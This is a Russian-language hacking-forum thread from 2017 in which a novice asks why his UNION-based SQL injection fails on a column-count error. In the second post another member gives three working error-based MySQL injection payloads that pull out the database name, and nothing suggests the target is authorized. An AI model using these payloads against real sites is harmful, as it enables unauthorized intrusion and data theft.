HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.10.2017, 00:41
Glorph
Новичок
Регистрация: 12.10.2016
Сообщений: 10
С нами: 5045366

Репутация: 0
По умолчанию

Добрый вечер. пытаюсь провести sql инъекцию. с помощью GROUP

by выяснил что всего 12 столбцов. но когда ввожу union select 1,2,3...12 мне выдается "The used SELECT statements have a different number of columns"
 
Ответить с цитированием

  #2  
Старый 16.10.2017, 13:29
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Пробуй Error based

and extractvalue(1,concat(0x3a,(database())))-- -

and updatexml(NULL,concat(0x3a, ( select database())),Null)-- -

SELECT COUNT(*)FROM(SELECT1UNIONSELECT2UNIONSELECT3)xGROU PBYCONCAT(MID(database(),1,63),FLOOR(RAND(0)*2))-- -
 
Ответить с цитированием

  #3  
Старый 16.10.2017, 13:33
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами: 5738006

Репутация: 147


По умолчанию

Он уже попробовал...

... а до него там это попробовали разного рода хакиры ещё 100500 тысяч раз!
 
Ответить с цитированием

  #4  
Старый 16.10.2017, 14:06
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Ну ошибка говорит , что не правильное количество столбцов подобрал.
 
Ответить с цитированием

  #5  
Старый 16.10.2017, 14:09
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами: 5738006

Репутация: 147


По умолчанию

Я говорил об этом...

Цитата:
Сообщение от karkajoi  

Пробуй Error based
Он попробовал и потом всё получилось, и, как позже выяснилось, это получилось не только у него!
 
Ответить с цитированием

  #6  
Старый 16.10.2017, 17:18
Glorph
Новичок
Регистрация: 12.10.2016
Сообщений: 10
С нами: 5045366

Репутация: 0
По умолчанию

всем спасибо за помощь буду разбираться в sql. людям которые написали в личку отдельное спасибо. если будут вопросы (а они будут) надеюсь не откажете в объяснение в личке. я понял что банальные мануалы по sql injection не подойдут. необходимо углубиться в сам язык. тему можно закрывать
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.